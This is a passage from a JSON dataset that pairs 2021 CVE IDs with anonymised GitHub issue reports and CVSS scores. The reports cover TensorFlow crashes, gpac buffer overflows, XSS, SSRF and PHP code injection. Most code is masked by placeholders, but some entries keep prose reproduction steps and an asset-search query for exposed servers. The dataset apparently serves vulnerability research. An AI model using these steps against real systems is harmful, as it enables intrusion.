  71833. "description": "APITAG crashes(aborts) when size is large. System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior APITAG crashes(aborts) when size is large Describe the expected behavior expect an exception message if the input unexpected instead of crash. Standalone code to reproduce the issue ~~~python import tensorflow as tf import numpy as np APITAG data_format='channels_first', APITAG ~~~ Output: ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG new_num_elements NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~",
  71834. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  71835. "severity": "MEDIUM",
  71836. "baseScore": 5.5,
  71837. "impactScore": 3.6,
  71838. "exploitabilityScore": 1.8
  71839. },
  71840. {
  71841. "CVE_ID": "CVE-2021-41200",
  71842. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/46909",
  71843. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/46909",
  71844. "Repo_new": "tensorflow/tensorflow",
  71845. "Issue_Created_At": "2021-02-04T03:59:44Z",
  71846. "description": "tf. APITAG aborts . System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior APITAG crash (abort) Describe the expected behavior expect an exception message if the input unexpected instead of crash. Standalone code to reproduce the issue ~~~python import tensorflow as tf import numpy as np APITAG APITAG ~~~ Output: ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG APITAG NUMBERTAG s. APITAG have a one element tensor Aborted (core dumped) ~~~",
  71847. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  71848. "severity": "MEDIUM",
  71849. "baseScore": 5.5,
  71850. "impactScore": 3.6,
  71851. "exploitabilityScore": 1.8
  71852. },
  71853. {
  71854. "CVE_ID": "CVE-2021-41202",
  71855. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/46912",
  71856. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/46912",
  71857. "Repo_new": "tensorflow/tensorflow",
  71858. "Issue_Created_At": "2021-02-04T04:39:54Z",
  71859. "description": "APITAG crashes(aborts) when num_rows contains large number. System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior APITAG crashes(aborts) when APITAG contains large number Describe the expected behavior expect an exception message if the input unexpected instead of crash. Standalone code to reproduce the issue ~~~python import tensorflow as tf import numpy as np APITAG APITAG ~~~ Output ~~~python NUMBERTAG APITAG F PATHTAG Check failed: size NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~",
  71860. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  71861. "severity": "MEDIUM",
  71862. "baseScore": 5.5,
  71863. "impactScore": 3.6,
  71864. "exploitabilityScore": 1.8
  71865. },
  71866. {
  71867. "CVE_ID": "CVE-2021-41202",
  71868. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/46889",
  71869. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/46889",
  71870. "Repo_new": "tensorflow/tensorflow",
  71871. "Issue_Created_At": "2021-02-03T16:54:54Z",
  71872. "description": "tf. APITAG crash (abort) when start is large. System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior APITAG crash (abort) when start is large Describe the expected behavior expect no crash Standalone code to reproduce the issue ~~~python import tensorflow as tf APITAG ~~~ Output: ~~~python NUMBERTAG APITAG F PATHTAG Non OK status: APITAG status: Internal: Expected shape dimensions to be non negative, got NUMBERTAG Aborted (core dumped) ~~~",
  71873. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  71874. "severity": "MEDIUM",
  71875. "baseScore": 5.5,
  71876. "impactScore": 3.6,
  71877. "exploitabilityScore": 1.8
  71878. },
  71879. {
  71880. "CVE_ID": "CVE-2021-41239",
  71881. "Issue_Url_old": "https://github.com/nextcloud/server/issues/27122",
  71882. "Issue_Url_new": "https://github.com/nextcloud/server/issues/27122",
  71883. "Repo_new": "nextcloud/server",
  71884. "Issue_Created_At": "2021-05-26T16:08:07Z",
  71885. "description": "user_status \"last statuses\" widget leaks account names. There should be an option to globally disable the APITAG statuses\" widget. It leaks account names, which might be the desired behaviour, but might as well be not. On \"semi public\" Nextcloud instances you usually don't want to expose other users to each other, which is also why e.g. APITAG can be disabled. Currently it's only possible to disable user_status altogether. It would be nice if there was the option to keep user_status enabled but disable the APITAG statuses\" widget.",
  71886. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  71887. "severity": "MEDIUM",
  71888. "baseScore": 5.3,
  71889. "impactScore": 1.4,
  71890. "exploitabilityScore": 3.9
  71891. },
  71892. {
  71893. "CVE_ID": "CVE-2021-41329",
  71894. "Issue_Url_old": "https://github.com/datalust/seq-tickets/issues/1322",
  71895. "Issue_Url_new": "https://github.com/datalust/seq-tickets/issues/1322",
  71896. "Repo_new": "datalust/seq-tickets",
  71897. "Issue_Created_At": "2021-09-15T23:38:50Z",
  71898. "description": "Query cache collisions when queries differ only by in clause contents. Seq uses time slice caching to speed up APITAG queries and a few others, in particular, those that drive Dashboards URLTAG . Behind the scenes, cache entries are keyed based on the clauses of the query, active signals, and so on. A bug in recent Seq versions up to NUMBERTAG causes the keys generated for in clauses to collide, when all elements of the detected set are constants. For example: APITAG and ERRORTAG will generate the same cache key, and thus produce incorrect results when two cacheable queries differ only in this respect. The bug is caused by inlining of arrays of constants: instead of APITAG generating an expression that constructs an array with a constant element, the array is precomputed and inlined as a constant itself. The code that subsequently generates query cache keys does not properly account for this case. Query cache entries will not collide if: The queries do not group by time and are not executed from a dashboard, The queries run over different signals, Any other aspect of the query, including the select , where , group by , having , and order by clauses, differ in any way.",
  71899. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  71900. "severity": "MEDIUM",
  71901. "baseScore": 6.5,
  71902. "impactScore": 3.6,
  71903. "exploitabilityScore": 2.8
  71904. },
  71905. {
  71906. "CVE_ID": "CVE-2021-4133",
  71907. "Issue_Url_old": "https://github.com/keycloak/keycloak/issues/9247",
  71908. "Issue_Url_new": "https://github.com/keycloak/keycloak/issues/9247",
  71909. "Repo_new": "keycloak/keycloak",
  71910. "Issue_Created_At": "2021-12-20T12:37:38Z",
  71911. "description": "Incorrect authorization allows unprivileged users to create other users. Describe the bug An incorrect authorization flaw was found in Keycloak NUMBERTAG the flaw allows an attacker with any existing user account to create new default user accounts via the administrative REST API even where new user registration is disabled. URLTAG Version NUMBERTAG Expected behavior _No response_ Actual behavior _No response_ How to Reproduce? _No response_ Anything else? _No response_",
  71912. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  71913. "severity": "HIGH",
  71914. "baseScore": 8.8,
  71915. "impactScore": 5.9,
  71916. "exploitabilityScore": 2.8
  71917. },
  71918. {
  71919. "CVE_ID": "CVE-2021-41402",
  71920. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/59",
  71921. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/59",
  71922. "Repo_new": "flatcore/flatcore-cms",
  71923. "Issue_Created_At": "2021-09-13T09:36:05Z",
  71924. "description": "Code execution vulnerabilities in the background. Describe the bug Code execution vulnerabilities in the background To Reproduce Steps to reproduce the behavior: APITAG in to the background NUMBERTAG Go to APITAG position APITAG info and enter the malicious php code in the Permalink parameter to jump out of the structure to execute the malicious code APITAG save PATHTAG and PATHTAG files will be inserted with malicious code APITAG the homepage and you will see that the malicious code we inserted was successfully executed and returned the result Screenshots FILETAG Click Save New Page PATHTAG and PATHTAG files will be inserted with malicious code FILETAG FILETAG FILETAG Desktop (please complete the following information): OS: APITAG Browser All Version Last version",
  71925. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  71926. "severity": "HIGH",
  71927. "baseScore": 8.8,
  71928. "impactScore": 5.9,
  71929. "exploitabilityScore": 2.8
  71930. },
  71931. {
  71932. "CVE_ID": "CVE-2021-41403",
  71933. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/60",
  71934. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/60",
  71935. "Repo_new": "flatcore/flatcore-cms",
  71936. "Issue_Created_At": "2021-09-14T02:58:17Z",
  71937. "description": "Server side request forgery vulnerability (SSRF). Describe the bug Server side request forgery vulnerability (SSRF) To Reproduce Steps to reproduce the behavior NUMBERTAG go to APITAG NUMBERTAG Enter the intranet address in the box to request NUMBERTAG Can make a request to the intranet Screenshots FILETAG request packet FILETAG Locate the vulnerable code APITAG The start_index parameter calls the function fc_crawler FILETAG Tracing the fc_crawler function Locate the vulnerable code ERRORTAG FILETAG Continue to track the APITAG function FILETAG Led to the SSRF vulnerability Desktop (please complete the following information): OS: APITAG Browser all Version last version",
  71938. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71939. "severity": "CRITICAL",
  71940. "baseScore": 9.8,
  71941. "impactScore": 5.9,
  71942. "exploitabilityScore": 3.9
  71943. },
  71944. {
  71945. "CVE_ID": "CVE-2021-41413",
  71946. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/20",
  71947. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/20",
  71948. "Repo_new": "brackeen/ok-file-formats",
  71949. "Issue_Created_At": "2021-09-10T01:15:24Z",
  71950. "description": "bugs found in APITAG and APITAG via honggfuzz. Test code : CODETAG Tools: honggfuzz NUMBERTAG Target version: master NUMBERTAG Result: CODETAG Here are the poc CVETAG",
  71951. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  71952. "severity": "HIGH",
  71953. "baseScore": 7.8,
  71954. "impactScore": 5.9,
  71955. "exploitabilityScore": 1.8
  71956. },
  71957. {
  71958. "CVE_ID": "CVE-2021-41415",
  71959. "Issue_Url_old": "https://github.com/youranreus/Subscription-Manager/issues/2",
  71960. "Issue_Url_new": "https://github.com/youranreus/subscription-manager/issues/2",
  71961. "Repo_new": "youranreus/subscription-manager",
  71962. "Issue_Created_At": "2021-09-14T03:11:22Z",
  71963. "description": "Subscription Manager NUMBERTAG FILETAG has a SQL Injection Vulnerability. Vulnerability file: APITAG ERRORTAG In the APITAG file, the APITAG parameter and the APITAG parameter under the APITAG method are controllable, and the APITAG parameter is not strictly filtered, causing XSS injection vulnerabilities! POC ERRORTAG FILETAG",
  71964. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  71965. "severity": "MEDIUM",
  71966. "baseScore": 6.1,
  71967. "impactScore": 2.7,
  71968. "exploitabilityScore": 2.8
  71969. },
  71970. {
  71971. "CVE_ID": "CVE-2021-41418",
  71972. "Issue_Url_old": "https://github.com/Amozing/Am0zang/issues/1",
  71973. "Issue_Url_new": "https://github.com/amozing/am0zang/issues/1",
  71974. "Repo_new": "amozing/am0zang",
  71975. "Issue_Created_At": "2021-09-14T10:09:23Z",
  71976. "description": "APITAG has an unauthorized access vulnerability. APITAG for assets using Fofa:\" ariang\" && country=\"CN\" (It's OK without \u201dCN\u201c ) FILETAG APITAG You can view the download history, view APITAG status, settings and settings of APITAG FILETAG FILETAG FILETAG FILETAG FILETAG",
  71977. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71978. "severity": "CRITICAL",
  71979. "baseScore": 9.8,
  71980. "impactScore": 5.9,
  71981. "exploitabilityScore": 3.9
  71982. },
  71983. {
  71984. "CVE_ID": "CVE-2021-41432",
  71985. "Issue_Url_old": "https://github.com/flatpressblog/flatpress/issues/88",
  71986. "Issue_Url_new": "https://github.com/flatpressblog/flatpress/issues/88",
  71987. "Repo_new": "flatpressblog/flatpress",
  71988. "Issue_Created_At": "2021-09-15T18:15:56Z",
  71989. "description": "Stored XSS in the Blog Content. APITAG NUMBERTAG Stored XSS in the Blog Content A stored Cross Site Scripting (XSS) vulnerability exists in version NUMBERTAG of the APITAG application that allows for arbitrary execution of APITAG commands. Steps to reproduce the vulnerability NUMBERTAG isit the APITAG Administration area NUMBERTAG Navigate to the Entries > Write Entry NUMBERTAG Enter any Subject NUMBERTAG In the content area put the following payload: APITAG FILETAG NUMBERTAG Click the APITAG button NUMBERTAG Stored XSS payload is triggered. FILETAG Also we can verify the stored XSS payload by navigating to the home page. FILETAG Discovered by Martin Kubecka, September NUMBERTAG",
  71990. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  71991. "severity": "MEDIUM",
  71992. "baseScore": 5.4,
  71993. "impactScore": 2.7,
  71994. "exploitabilityScore": 2.3
  71995. },
  71996. {
  71997. "CVE_ID": "CVE-2021-41456",
  71998. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1911",
  71999. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1911",
  72000. "Repo_new": "gpac/gpac",
  72001. "Issue_Created_At": "2021-09-07T16:21:54Z",
  72002. "description": "Stack buffer overflow in APITAG at PATHTAG in nhmldmx_send_sample. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG",
  72003. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72004. "severity": "HIGH",
  72005. "baseScore": 7.5,
  72006. "impactScore": 3.6,
  72007. "exploitabilityScore": 3.9
  72008. },
  72009. {
  72010. "CVE_ID": "CVE-2021-41457",
  72011. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1909",
  72012. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1909",
  72013. "Repo_new": "gpac/gpac",
  72014. "Issue_Created_At": "2021-09-07T15:26:17Z",
  72015. "description": "Stack buffer overflow in APITAG at PATHTAG in nhmldmx_init_parsing. [x] I looked for a similar issue and couldn't find any. [x] I tried with the latest version of GPAC. Installers available at URLTAG [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). Step to reproduce NUMBERTAG get latest commit code (GPAC version NUMBERTAG DEV re NUMBERTAG gd NUMBERTAG acad8 master NUMBERTAG compile with enable sanitizer NUMBERTAG make NUMBERTAG dirs, each of which has a large name(length NUMBERTAG this makes the file's abs path length larger than NUMBERTAG we called it APITAG NUMBERTAG run APITAG add {path to APITAG new new.mp4 Env: Ubuntu NUMBERTAG clang NUMBERTAG My cmd line an ASAN report APITAG add PATHTAG new new.mp4 ASAN report: ERRORTAG Maybe fix for issue NUMBERTAG does not consider this situation that there is a stack buffer overflow in nhmldmx_init_parsing",
  72016. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72017. "severity": "HIGH",
  72018. "baseScore": 7.5,
  72019. "impactScore": 3.6,
  72020. "exploitabilityScore": 3.9
  72021. },
  72022. {
  72023. "CVE_ID": "CVE-2021-41458",
  72024. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1910",
  72025. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1910",
  72026. "Repo_new": "gpac/gpac",
  72027. "Issue_Created_At": "2021-09-07T16:19:06Z",
  72028. "description": "SEGV on unknown address in APITAG at PATHTAG in gf_blob_get. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG ERRORTAG",
  72029. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  72030. "severity": "MEDIUM",
  72031. "baseScore": 5.5,
  72032. "impactScore": 3.6,
  72033. "exploitabilityScore": 1.8
  72034. },
  72035. {
  72036. "CVE_ID": "CVE-2021-41459",
  72037. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1912",
  72038. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1912",
  72039. "Repo_new": "gpac/gpac",
  72040. "Issue_Created_At": "2021-09-07T16:28:12Z",
  72041. "description": "Stack buffer overflow in APITAG at PATHTAG in nhmldmx_send_sample. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! [x] I looked for a similar issue and couldn't find any. [x] I tried with the latest version of GPAC. Installers available at URLTAG [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). Step to reproduce NUMBERTAG get latest commit code (GPAC version NUMBERTAG DEV re NUMBERTAG gd NUMBERTAG acad8 master NUMBERTAG compile with enable sanitizer NUMBERTAG run APITAG add APITAG new new.mp4 Env: Ubuntu NUMBERTAG clang NUMBERTAG ASAN report ERRORTAG Different from issue NUMBERTAG the overflow memory is related to APITAG parameter. The APITAG para has the same problem, please fix them together. Buggy code at APITAG CODETAG",
  72042. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72043. "severity": "HIGH",
  72044. "baseScore": 7.5,
  72045. "impactScore": 3.6,
  72046. "exploitabilityScore": 3.9
  72047. },
  72048. {
  72049. "CVE_ID": "CVE-2021-4146",
  72050. "Issue_Url_old": "https://github.com/pimcore/pimcore/issues/11024",
  72051. "Issue_Url_new": "https://github.com/pimcore/pimcore/issues/11024",
  72052. "Repo_new": "pimcore/pimcore",
  72053. "Issue_Created_At": "2021-12-15T10:48:42Z",
  72054. "description": "APITAG Pricing Rules Do not allow negative discounts. Expected behavior Not possible to set negative discounts Actual behavior It is possible to set negative discounts for Cart & Product discount actions, then adds it to to total amount. Steps to reproduce NUMBERTAG Login to the application URLTAG NUMBERTAG Navigate to Online shop > Pricing Rules > Voucher Discount > Actions NUMBERTAG Enter Negative amount in Cart Discount and click on save.",
  72055. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
  72056. "severity": "MEDIUM",
  72057. "baseScore": 4.3,
  72058. "impactScore": 1.4,
  72059. "exploitabilityScore": 2.8
  72060. },
  72061. {
  72062. "CVE_ID": "CVE-2021-41461",
  72063. "Issue_Url_old": "https://github.com/concrete5/concrete5-legacy/issues/2006",
  72064. "Issue_Url_new": "https://github.com/concretecms/concrete5-legacy/issues/2006",
  72065. "Repo_new": "concretecms/concrete5-legacy",
  72066. "Issue_Created_At": "2021-09-16T06:01:54Z",
  72067. "description": "FILETAG Where the Issue Occurred The code below displays the user controlled parameter rel , APITAG , and mode in PATHTAG rel in PATHTAG and cID in PATHTAG without sufficient sanitization: URLTAG URLTAG URLTAG URLTAG URLTAG",
  72068. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  72069. "severity": "MEDIUM",
  72070. "baseScore": 6.1,
  72071. "impactScore": 2.7,
  72072. "exploitabilityScore": 2.8
  72073. },
  72074. {
  72075. "CVE_ID": "CVE-2021-41467",
  72076. "Issue_Url_old": "https://github.com/hjue/JustWriting/issues/106",
  72077. "Issue_Url_new": "https://github.com/hjue/justwriting/issues/106",
  72078. "Repo_new": "hjue/justwriting",
  72079. "Issue_Created_At": "2021-09-17T06:50:17Z",
  72080. "description": "APITAG XSS in PATHTAG Describe the bug/issue Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim\u2019s browser. Note that these multiple XSS vulnerabilities exist in the APITAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to the following link: URLTAG NUMBERTAG Boom! Where the vulnerability occurred? The code below displays the user controlled parameter challenge in PATHTAG with incorrect sanitization: URLTAG",
  72081. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  72082. "severity": "MEDIUM",
  72083. "baseScore": 6.1,
  72084. "impactScore": 2.7,
  72085. "exploitabilityScore": 2.8
  72086. },
  72087. {
  72088. "CVE_ID": "CVE-2021-41490",
  72089. "Issue_Url_old": "https://github.com/ompl/ompl/issues/833",
  72090. "Issue_Url_new": "https://github.com/ompl/ompl/issues/833",
  72091. "Repo_new": "ompl/ompl",
  72092. "Issue_Created_At": "2021-09-18T06:09:08Z",
  72093. "description": "Memory leaks in APITAG Here are some outputs NUMBERTAG f5dbf NUMBERTAG in operator new(unsigned long) ( PATHTAG NUMBERTAG f5dbe NUMBERTAG b NUMBERTAG in APITAG const PATHTAG NUMBERTAG f5dbe3d NUMBERTAG in APITAG const ) const PATHTAG NUMBERTAG f5dbe NUMBERTAG in APITAG const ) const PATHTAG NUMBERTAG f5dbe NUMBERTAG in APITAG const&) PATHTAG After our analysis, this crash comes from APITAG In line PATHTAG of APITAG they can apply for memory space. At the same time, the APITAG function can release the memory. However, during our testing, the program will still run to APITAG PATHTAG (application meomory space) after the last call of APITAG so the memory space is not completely released and causing memory leaks.",
  72094. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72095. "severity": "HIGH",
  72096. "baseScore": 7.5,
  72097. "impactScore": 3.6,
  72098. "exploitabilityScore": 3.9
  72099. },
  72100. {
  72101. "CVE_ID": "CVE-2021-41495",
  72102. "Issue_Url_old": "https://github.com/numpy/numpy/issues/19038",
  72103. "Issue_Url_new": "https://github.com/numpy/numpy/issues/19038",
  72104. "Repo_new": "numpy/numpy",
  72105. "Issue_Created_At": "2021-05-19T06:21:52Z",
  72106. "description": "Missing return value validation of the function APITAG APITAG Reproducing code example: The definition of APITAG CODETAG Call site example for APITAG CODETAG Error message: At most of the call sites of APITAG the return value is not validated, but an invalid address may be returned. FILETAG APITAG version information: the main branch",
  72107. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
  72108. "severity": "MEDIUM",
  72109. "baseScore": 5.3,
  72110. "impactScore": 3.6,
  72111. "exploitabilityScore": 1.6
  72112. },
  72113. {
  72114. "CVE_ID": "CVE-2021-41496",
  72115. "Issue_Url_old": "https://github.com/numpy/numpy/issues/19000",
  72116. "Issue_Url_new": "https://github.com/numpy/numpy/issues/19000",
  72117. "Repo_new": "numpy/numpy",
  72118. "Issue_Created_At": "2021-05-13T04:05:51Z",
  72119. "description": "Potential buffer overflow from string operations in function array_from_pyobj of fortranobject.c. APITAG Reproducing code example: Snippet : ERRORTAG Error message: File : PATHTAG Function : array_from_pyobj (line NUMBERTAG Optional call path : External > fortran_setattr > array_from_pyobj Details in FILETAG When we run our analysis tool on APITAG a few inappropriate string operations are reported at call sites of the functions strcpy, sprintf, and strcat in array_from_pyobj. There are no boundary checks at these points; although \"mess\" seems large enough to keep the operations safe, this does not hold at the point shown above. As a suggestion, it is better to replace these functions with strncpy, strncat, and snprintf. APITAG version information: the main branch of APITAG",
  72120. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  72121. "severity": "MEDIUM",
  72122. "baseScore": 5.5,
  72123. "impactScore": 3.6,
  72124. "exploitabilityScore": 1.8
  72125. },
  72126. {
  72127. "CVE_ID": "CVE-2021-41497",
  72128. "Issue_Url_old": "https://github.com/RaRe-Technologies/bounter/issues/47",
  72129. "Issue_Url_new": "https://github.com/rare-technologies/bounter/issues/47",
  72130. "Repo_new": "rare-technologies/bounter",
  72131. "Issue_Created_At": "2021-05-14T08:12:08Z",
  72132. "description": "Potential buffer overflow in APITAG of hill.c. APITAG APITAG Description Write to \"self >registers FILETAG PATHTAG to Reproduce ERRORTAG Optional call path : increment > APITAG > APITAG > APITAG Expected Results Return after APITAG Actual Results No return Versions the main branch APITAG",
  72133. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72134. "severity": "HIGH",
  72135. "baseScore": 7.5,
  72136. "impactScore": 3.6,
  72137. "exploitabilityScore": 3.9
  72138. },
  72139. {
  72140. "CVE_ID": "CVE-2021-41498",
  72141. "Issue_Url_old": "https://github.com/belangeo/pyo/issues/221",
  72142. "Issue_Url_new": "https://github.com/belangeo/pyo/issues/221",
  72143. "Repo_new": "belangeo/pyo",
  72144. "Issue_Created_At": "2021-05-27T06:00:51Z",
  72145. "description": "Missing a terminator after strncpy in function Server_jack_init, which may cause read overflow. Code snippet CODETAG Description Function : Server_jack_init File : ad_jack.c Call path : boot APITAG > Server_boot > Server_jack_init APITAG : read overflow. Our analysis tool reported a warning at the call site of strncpy. As client_name is not initialized, it may have no NUL terminator after strncpy, which can cause a read overflow (out-of-bounds read). Also seen in FILETAG",
  72146. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72147. "severity": "HIGH",
  72148. "baseScore": 7.5,
  72149. "impactScore": 3.6,
  72150. "exploitabilityScore": 3.9
  72151. },
  72152. {
  72153. "CVE_ID": "CVE-2021-41499",
  72154. "Issue_Url_old": "https://github.com/belangeo/pyo/issues/222",
  72155. "Issue_Url_new": "https://github.com/belangeo/pyo/issues/222",
  72156. "Repo_new": "belangeo/pyo",
  72157. "Issue_Created_At": "2021-05-27T06:14:03Z",
  72158. "description": "Insecure function vsprintf may cause write overflow in function Server_debug. Code snippet ERRORTAG Description Function : Server_debug File : servermodule.c Call path : recstart APITAG > Server_start_rec > Server_start_rec_internal > Server_debug APITAG : Write overflow. Our analysis tool reported a warning at vsprintf in Server_debug. As buffer is a fixed-size stack variable, when debug mode is enabled vsprintf may write past its end since there is no boundary check, especially when the inputs depend on external modules (e.g., Python). Also seen in FILETAG",
  72159. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72160. "severity": "HIGH",
  72161. "baseScore": 7.5,
  72162. "impactScore": 3.6,
  72163. "exploitabilityScore": 3.9
  72164. },
  72165. {
  72166. "CVE_ID": "CVE-2021-41500",
  72167. "Issue_Url_old": "https://github.com/cvxopt/cvxopt/issues/193",
  72168. "Issue_Url_new": "https://github.com/cvxopt/cvxopt/issues/193",
  72169. "Repo_new": "cvxopt/cvxopt",
  72170. "Issue_Created_At": "2021-05-27T07:26:26Z",
  72171. "description": "Incomplete comparison with function strncmp. Code snippet CODETAG Description Function : PATHTAG Call path NUMBERTAG solve APITAG > solve > strncmp NUMBERTAG spsolve APITAG > spsolve > strncmp NUMBERTAG APITAG > diag > strncmp NUMBERTAG APITAG > getfactor > strncmp APITAG : Incomplete comparison. Our analysis tool reported four warnings about incomplete string comparisons, as shown above. When the comparison length is NUMBERTAG the terminator is ignored, so only a prefix is compared. Hence even when strncmp returns NUMBERTAG the strings may not actually match, specifically when the variable descr depends on external inputs APITAG For example, with descr = \"CHOLMOD APITAG the comparison still returns NUMBERTAG Also seen in FILETAG , FILETAG , FILETAG and FILETAG",
  72172. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72173. "severity": "HIGH",
  72174. "baseScore": 7.5,
  72175. "impactScore": 3.6,
  72176. "exploitabilityScore": 3.9
  72177. },
  72178. {
  72179. "CVE_ID": "CVE-2021-41502",
  72180. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/885",
  72181. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/885",
  72182. "Repo_new": "intelliants/subrion",
  72183. "Issue_Created_At": "2021-09-19T07:45:36Z",
  72184. "description": "FILETAG no: FILETAG detailed steps: After publishing a blog with uploaded pictures, click APITAG Blog Entry\" to enter the modification page, open Burp Suit and then directly click \"save\", modify the content of image FILETAG Any member browses the blog page: FILETAG",
  72185. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  72186. "severity": "MEDIUM",
  72187. "baseScore": 5.4,
  72188. "impactScore": 2.7,
  72189. "exploitabilityScore": 2.3
  72190. },
  72191. {
  72192. "CVE_ID": "CVE-2021-4156",
  72193. "Issue_Url_old": "https://github.com/libsndfile/libsndfile/issues/731",
  72194. "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/731",
  72195. "Repo_new": "libsndfile/libsndfile",
  72196. "Issue_Created_At": "2021-04-13T15:59:19Z",
